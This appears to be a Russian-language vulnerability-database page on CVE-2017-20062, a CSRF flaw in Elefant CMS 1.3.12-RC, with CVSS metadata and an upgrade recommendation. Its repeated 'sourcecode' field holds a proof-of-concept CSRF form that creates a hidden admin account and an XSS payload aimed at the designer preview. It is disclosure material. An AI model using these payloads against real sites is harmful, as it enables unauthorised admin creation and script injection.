Elefant CMS 1.3.12-RC неизвестная уязвимость

ВходИсторияДиффjsonxmlCTI

Уязвимость, классифицированная как проблемные, была найдена в Elefant CMS 1.3.12-RC. Затронута неизвестная функция. Определение CWE для уязвимости следующее CWE-352. Консультацию можно прочитать на сайте seclists.org. Выявление этой уязвимости является CVE-2017-20062. Атака может быть инициирована удаленно. Технические подробности отсутствуют. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время. Объявляется proof-of-concept. Эксплойт доступен по адресу seclists.org. Уязвимость обрабатывалась как непубличный эксплойт нулевого дня в течение как минимум 283 дней. Мы ожидаем, что 0-день стоил приблизительно $0-$5k. Обновление до версии 1.3.13 способно решить эту проблему. Рекомендуется обновить затронутый компонент.

Поле	24.02.2017 15:48	24.02.2017 15:49	18.06.2022 16:19
vendor	Elefant	Elefant	Elefant
name	CMS	CMS	CMS
version	1.3.12-RC	1.3.12-RC	1.3.12-RC
vendorinformdate	1462752000	1462752000	1462752000
risk	1	1	1
cvss2_vuldb_basescore	5.1	5.1	5.1
cvss2_vuldb_tempscore	3.8	3.8	3.8
cvss2_vuldb_av	N	N	N
cvss2_vuldb_ac	H	H	H
cvss2_vuldb_au	N	N	N
cvss2_vuldb_ci	P	P	P
cvss2_vuldb_ii	P	P	P
cvss2_vuldb_ai	P	P	P
cvss2_researcher_av	N	N	N
cvss2_researcher_ac	H	H	H
cvss2_researcher_au	N	N	N
cvss2_researcher_ci	P	P	P
cvss2_researcher_ii	P	P	P
cvss2_researcher_ai	P	P	P
cvss3_meta_basescore	5.0	5.0	5.0
cvss3_meta_tempscore	4.3	4.3	4.3
cvss3_vuldb_basescore	5.0	5.0	5.0
cvss3_vuldb_tempscore	4.3	4.3	4.3
cvss3_vuldb_av	N	N	N
cvss3_vuldb_ac	H	H	H
cvss3_vuldb_pr	N	N	N
cvss3_vuldb_ui	R	R	R
cvss3_vuldb_s	U	U	U
cvss3_vuldb_c	L	L	L
cvss3_vuldb_i	L	L	L
cvss3_vuldb_a	L	L	L
date	1487203200 (16.02.2017)	1487203200 (16.02.2017)	1487203200 (16.02.2017)
location	Full-Disclosure	Full-Disclosure	Full-Disclosure
type	Mailinglist Post	Mailinglist Post	Mailinglist Post
url	http://seclists.org/fulldisclosure/2017/Feb/37	http://seclists.org/fulldisclosure/2017/Feb/37	http://seclists.org/fulldisclosure/2017/Feb/37
identifier	Elefant CMS 1.3.12-RC: CSRF	Elefant CMS 1.3.12-RC: CSRF	Elefant CMS 1.3.12-RC: CSRF
person_name	Tim Coen	Tim Coen	Tim Coen
company_name	Curesec Research Team	Curesec Research Team	Curesec Research Team
availability	1	1	1
date	1487203200 (16.02.2017)	1487203200 (16.02.2017)	1487203200 (16.02.2017)
publicity	1	1	1
url	http://seclists.org/fulldisclosure/2017/Feb/37	http://seclists.org/fulldisclosure/2017/Feb/37	http://seclists.org/fulldisclosure/2017/Feb/37
developer_name	Tim Coen	Tim Coen	Tim Coen
price_0day	$0-$5k	$0-$5k	$0-$5k
sourcecode	<html> <body> <form action="http://localhost/user/add"; method ="POST"> <input type="hidden" name="name" value="admin3" /> <input type= "hidden" name="email" value="admin3 () example com" /> <input type="hidden" name= "password" value="admin3" /> <input type="hidden" name="verify_pass" value= "admin3" /> <input type="hidden" name="type" value="admin" /> <input type= "hidden" name="company" value="" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="website" value="" /> <input type="hidden" name= "photo" value="" /> <input type="hidden" name="about" value="" /> <input type= "hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name= "address2" value="" /> <input type="hidden" name="city" value="" /> <input type ="hidden" name="state" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="zip" value="" /> <input type="submit" value= "Submit request" /> </form> </body> </html> XSS: <html> <body> <form action= "http://localhost/designer/preview"; method="POST"> <input type="hidden" name= "layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value= "Submit request" /> </form> </body> </html>	<html> <body> <form action="http://localhost/user/add"; method ="POST"> <input type="hidden" name="name" value="admin3" /> <input type= "hidden" name="email" value="admin3 () example com" /> <input type="hidden" name= "password" value="admin3" /> <input type="hidden" name="verify_pass" value= "admin3" /> <input type="hidden" name="type" value="admin" /> <input type= "hidden" name="company" value="" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="website" value="" /> <input type="hidden" name= "photo" value="" /> <input type="hidden" name="about" value="" /> <input type= "hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name= "address2" value="" /> <input type="hidden" name="city" value="" /> <input type ="hidden" name="state" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="zip" value="" /> <input type="submit" value= "Submit request" /> </form> </body> </html> XSS: <html> <body> <form action= "http://localhost/designer/preview"; method="POST"> <input type="hidden" name= "layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value= "Submit request" /> </form> </body> </html>	<html> <body> <form action="http://localhost/user/add"; method ="POST"> <input type="hidden" name="name" value="admin3" /> <input type= "hidden" name="email" value="admin3 () example com" /> <input type="hidden" name= "password" value="admin3" /> <input type="hidden" name="verify_pass" value= "admin3" /> <input type="hidden" name="type" value="admin" /> <input type= "hidden" name="company" value="" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="website" value="" /> <input type="hidden" name= "photo" value="" /> <input type="hidden" name="about" value="" /> <input type= "hidden" name="phone" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name= "address2" value="" /> <input type="hidden" name="city" value="" /> <input type ="hidden" name="state" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="zip" value="" /> <input type="submit" value= "Submit request" /> </form> </body> </html> XSS: <html> <body> <form action= "http://localhost/designer/preview"; method="POST"> <input type="hidden" name= "layout" value="<img src=no onerror=alert(1)>" /> <input type="submit" value= "Submit request" /> </form> </body> </html>
name	Обновление	Обновление	Обновление
upgrade_version	1.3.13	1.3.13	1.3.13
seealso	97260 97261 97255 97256 97257 97258	97260 97261 97255 97256 97257 97258	97260 97261 97255 97256 97257 97258
cvss2_vuldb_e	POC	POC	POC
cvss2_vuldb_rl	OF	OF	OF
cvss2_vuldb_rc	UR	UR	UR
cvss3_vuldb_e	P	P	P
cvss3_vuldb_rl	O	O	O
cvss3_vuldb_rc	R	R	R
0day_days	283	283	283
type		Content Management System	Content Management System
cwe	0	352 (подделка межсайтовых запросов)	352 (подделка межсайтовых запросов)
cve			CVE-2017-20062
responsible			VulDB
cvss2_researcher_basescore			5.1

◂ Предыдущий Обзор Далее ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!